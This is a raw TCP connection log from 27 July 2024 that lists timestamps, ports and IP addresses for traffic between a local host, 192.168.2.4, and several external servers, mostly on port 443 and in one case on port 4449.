Jul 27, 2024 07:44:35.269982100 CEST	62290	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:35.270013094 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:35.270051956 CEST	443	62290	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:35.290900946 CEST	443	62292	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:35.291152000 CEST	62292	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:35.295650959 CEST	62292	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:35.295703888 CEST	443	62292	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:35.296792984 CEST	443	62292	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:35.297996998 CEST	62292	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:35.297996998 CEST	62292	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:35.298299074 CEST	443	62292	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:35.946845055 CEST	62293	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:44:35.951982021 CEST	4449	62293	193.222.96.24	192.168.2.4
Jul 27, 2024 07:44:35.952060938 CEST	62293	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:44:35.972675085 CEST	62293	4449	192.168.2.4	193.222.96.24
Jul 27, 2024 07:44:35.977622032 CEST	4449	62293	193.222.96.24	192.168.2.4
Jul 27, 2024 07:44:36.078058958 CEST	443	62291	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:36.078231096 CEST	443	62291	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:36.078310966 CEST	62291	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:36.099318027 CEST	62291	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:36.099374056 CEST	443	62291	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:36.099405050 CEST	62291	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:36.099421978 CEST	443	62291	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:36.212889910 CEST	62294	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:36.212970972 CEST	443	62294	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:36.213074923 CEST	62294	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:36.213696957 CEST	62294	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:36.213738918 CEST	443	62294	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:36.341373920 CEST	443	62292	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:36.341610909 CEST	443	62292	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:36.341871977 CEST	62292	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:36.341952085 CEST	62292	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:36.341988087 CEST	443	62292	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:36.470130920 CEST	62295	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:36.470171928 CEST	443	62295	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:36.470249891 CEST	62295	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:36.470551014 CEST	62295	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:36.470562935 CEST	443	62295	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:36.823339939 CEST	443	62294	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:36.823528051 CEST	62294	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:36.843998909 CEST	62294	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:36.844079018 CEST	443	62294	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:36.844224930 CEST	62294	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:36.844249010 CEST	443	62294	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:36.844367027 CEST	443	62294	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:36.857991934 CEST	62294	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:36.858074903 CEST	443	62294	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:36.954744101 CEST	443	62295	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:36.954813957 CEST	62295	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:36.957905054 CEST	62295	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:36.957920074 CEST	443	62295	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:36.958319902 CEST	443	62295	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:36.960217953 CEST	62295	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:36.960354090 CEST	62295	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:36.960386038 CEST	443	62295	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:36.960441113 CEST	62295	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:36.960452080 CEST	443	62295	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:37.482362032 CEST	443	62295	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:37.482620955 CEST	443	62295	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:37.482791901 CEST	62295	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:37.487656116 CEST	62295	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:37.487679005 CEST	443	62295	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:37.756347895 CEST	62296	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:37.756385088 CEST	443	62296	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:37.756535053 CEST	62296	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:37.756915092 CEST	62296	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:37.756928921 CEST	443	62296	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:38.109292030 CEST	443	62294	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:38.109357119 CEST	443	62294	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:38.109687090 CEST	62294	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:38.128396988 CEST	62294	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:38.128397942 CEST	62294	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:38.128462076 CEST	443	62294	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:38.128524065 CEST	443	62294	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:38.229548931 CEST	443	62296	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:38.229625940 CEST	62296	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:38.235243082 CEST	62296	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:38.235258102 CEST	443	62296	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:38.235614061 CEST	443	62296	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:38.236654043 CEST	62296	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:38.236736059 CEST	62296	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:38.236800909 CEST	443	62296	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:38.243645906 CEST	62297	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:38.243689060 CEST	443	62297	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:38.243932962 CEST	62297	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:38.244306087 CEST	62297	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:38.244322062 CEST	443	62297	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:38.652776957 CEST	443	62296	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:38.652899027 CEST	443	62296	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:38.652981043 CEST	62296	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:38.656467915 CEST	62296	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:38.656514883 CEST	443	62296	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:38.662606955 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:38.662687063 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:38.662802935 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:38.663135052 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:38.663173914 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:38.904206038 CEST	443	62297	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:38.904306889 CEST	62297	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:38.907071114 CEST	62297	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:38.907099009 CEST	443	62297	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:38.907154083 CEST	62297	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:38.907164097 CEST	443	62297	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:38.907314062 CEST	443	62297	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:38.909018993 CEST	62297	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:38.909046888 CEST	443	62297	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:39.170162916 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:39.170269966 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:39.178495884 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:39.178546906 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:39.179140091 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:39.214144945 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:39.214739084 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:39.214834929 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:39.214998960 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:39.215079069 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:39.215218067 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:39.215287924 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:39.216234922 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:39.216408968 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:39.216525078 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:39.217972994 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:39.218029976 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:39.219765902 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:39.219810963 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:39.219832897 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:39.219865084 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:39.220052958 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:39.220092058 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:39.220124960 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:39.220146894 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:39.220341921 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:39.220382929 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:39.220426083 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:39.220449924 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:39.220570087 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:39.220613956 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:39.220670938 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:39.220706940 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:39.220758915 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:39.220779896 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:39.567179918 CEST	62299	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:39.567213058 CEST	443	62299	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:39.567291021 CEST	62299	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:39.567589045 CEST	62299	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:39.567600012 CEST	443	62299	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:39.786499977 CEST	443	62297	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:39.786566019 CEST	443	62297	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:39.786648989 CEST	62297	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:39.802459002 CEST	62297	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:39.802510023 CEST	443	62297	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:39.802541018 CEST	62297	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:39.802556992 CEST	443	62297	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:39.915580988 CEST	62300	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:39.915659904 CEST	443	62300	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:39.915867090 CEST	62300	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:39.916261911 CEST	62300	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:39.916300058 CEST	443	62300	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:40.155163050 CEST	443	62299	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:40.155308008 CEST	62299	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:40.161186934 CEST	62299	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:40.161197901 CEST	443	62299	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:40.161588907 CEST	443	62299	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:40.162782907 CEST	62299	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:40.162908077 CEST	62299	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:40.162940025 CEST	443	62299	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:40.163002014 CEST	62299	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:40.163012981 CEST	443	62299	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:40.499561071 CEST	443	62300	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:40.499641895 CEST	62300	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:40.504105091 CEST	62300	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:40.504126072 CEST	443	62300	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:40.504221916 CEST	62300	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:40.504232883 CEST	443	62300	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:40.504520893 CEST	443	62300	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:40.504977942 CEST	62300	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:40.505007029 CEST	443	62300	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:40.686033010 CEST	443	62299	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:40.686248064 CEST	443	62299	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:40.686297894 CEST	62299	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:40.686343908 CEST	62299	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:40.686361074 CEST	443	62299	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:41.528562069 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:41.528816938 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:41.529025078 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:41.643815994 CEST	62298	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:41.643857956 CEST	443	62298	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:41.730406046 CEST	443	62300	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:41.730495930 CEST	443	62300	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:41.730550051 CEST	62300	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:41.747752905 CEST	62300	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:41.747778893 CEST	443	62300	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:41.747812033 CEST	62300	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:41.747826099 CEST	443	62300	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:41.853094101 CEST	62301	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:41.853152037 CEST	443	62301	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:41.853224039 CEST	62301	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:41.853590012 CEST	62301	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:41.853621960 CEST	443	62301	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:42.004112005 CEST	62302	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:42.004179955 CEST	443	62302	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:42.004288912 CEST	62302	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:42.004663944 CEST	62302	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:42.004690886 CEST	443	62302	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:42.445472002 CEST	443	62301	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:42.445549011 CEST	62301	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:42.448945045 CEST	62301	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:42.448961973 CEST	443	62301	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:42.449068069 CEST	62301	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:42.449079037 CEST	443	62301	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:42.449358940 CEST	443	62301	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:42.449678898 CEST	62301	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:42.492495060 CEST	443	62301	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:42.497353077 CEST	443	62302	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:42.497421026 CEST	62302	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:42.501880884 CEST	62302	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:42.501910925 CEST	443	62302	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:42.502376080 CEST	443	62302	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:42.505223036 CEST	62302	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:42.505260944 CEST	62302	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:42.505357981 CEST	443	62302	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:43.171489000 CEST	443	62302	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:43.171739101 CEST	443	62302	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:43.171828032 CEST	62302	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:43.174190998 CEST	62302	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:43.174190998 CEST	62302	443	192.168.2.4	188.114.97.3
Jul 27, 2024 07:44:43.174230099 CEST	443	62302	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:43.174252987 CEST	443	62302	188.114.97.3	192.168.2.4
Jul 27, 2024 07:44:43.844047070 CEST	443	62301	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:43.844151020 CEST	443	62301	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:43.844242096 CEST	62301	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:43.867909908 CEST	62301	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:43.867950916 CEST	443	62301	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:43.868026972 CEST	62301	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:43.868041992 CEST	443	62301	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:43.978055000 CEST	62303	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:43.978144884 CEST	443	62303	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:43.979207039 CEST	62303	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:43.979602098 CEST	62303	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:43.979635954 CEST	443	62303	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:44.640532970 CEST	443	62303	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:44.642956972 CEST	62303	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:44.645172119 CEST	62303	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:44.645195007 CEST	443	62303	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:44.645463943 CEST	62303	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:44.645473957 CEST	443	62303	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:44.645565033 CEST	443	62303	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:44.646576881 CEST	62303	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:44.646605015 CEST	443	62303	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:45.530420065 CEST	443	62303	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:45.530483961 CEST	443	62303	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:45.536312103 CEST	62303	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:45.551347017 CEST	62303	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:45.551371098 CEST	443	62303	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:45.551387072 CEST	62303	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:45.551394939 CEST	443	62303	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:45.658812046 CEST	62304	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:45.658854961 CEST	443	62304	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:45.662336111 CEST	62304	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:45.662853003 CEST	62304	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:45.662883997 CEST	443	62304	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:46.293891907 CEST	443	62304	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:46.295977116 CEST	62304	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:46.298928976 CEST	62304	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:46.298947096 CEST	443	62304	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:46.311208963 CEST	62304	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:46.311233997 CEST	443	62304	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:46.311306953 CEST	443	62304	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:46.311836958 CEST	62304	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:46.352511883 CEST	443	62304	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:47.764523029 CEST	443	62304	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:47.764597893 CEST	443	62304	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:47.765564919 CEST	62304	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:47.779942036 CEST	62304	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:47.779959917 CEST	443	62304	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:47.779973984 CEST	62304	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:47.779979944 CEST	443	62304	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:47.886805058 CEST	62305	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:47.886847973 CEST	443	62305	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:47.889875889 CEST	62305	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:47.890383005 CEST	62305	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:47.890403032 CEST	443	62305	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:48.515639067 CEST	443	62305	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:48.531987906 CEST	62305	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:48.535739899 CEST	62305	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:48.535767078 CEST	443	62305	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:48.539695978 CEST	62305	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:48.539701939 CEST	443	62305	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:48.539782047 CEST	443	62305	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:48.552241087 CEST	62305	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:48.592531919 CEST	443	62305	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:49.116904974 CEST	62306	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:49.116945982 CEST	443	62306	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:49.117201090 CEST	62306	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:49.117527962 CEST	62306	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:49.117542982 CEST	443	62306	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:49.760598898 CEST	443	62306	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:49.772500992 CEST	443	62306	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:49.780615091 CEST	62306	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:49.788599014 CEST	62306	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:49.788652897 CEST	443	62306	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:49.788944960 CEST	443	62306	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:49.792562962 CEST	62306	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:49.792562962 CEST	62306	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:49.792650938 CEST	443	62306	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:49.879017115 CEST	443	62305	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:49.879069090 CEST	443	62305	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:49.881248951 CEST	62305	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:49.895575047 CEST	62305	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:49.895607948 CEST	443	62305	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:49.895631075 CEST	62305	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:49.895641088 CEST	443	62305	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:50.002667904 CEST	62307	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:50.002754927 CEST	443	62307	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:50.007088900 CEST	62307	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:50.007739067 CEST	62307	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:50.007771015 CEST	443	62307	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:50.205065966 CEST	443	62306	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:50.205282927 CEST	443	62306	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:50.216516018 CEST	443	62306	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:50.223567009 CEST	62306	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:50.230119944 CEST	62306	443	192.168.2.4	172.67.213.85
Jul 27, 2024 07:44:50.230180025 CEST	443	62306	172.67.213.85	192.168.2.4
Jul 27, 2024 07:44:50.661772966 CEST	443	62307	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:50.661958933 CEST	62307	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:50.664091110 CEST	62307	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:50.664119005 CEST	443	62307	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:50.664254904 CEST	62307	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:50.664268017 CEST	443	62307	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:50.664340019 CEST	443	62307	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:50.666229963 CEST	62307	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:50.712533951 CEST	443	62307	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:51.879062891 CEST	443	62307	167.235.128.153	192.168.2.4
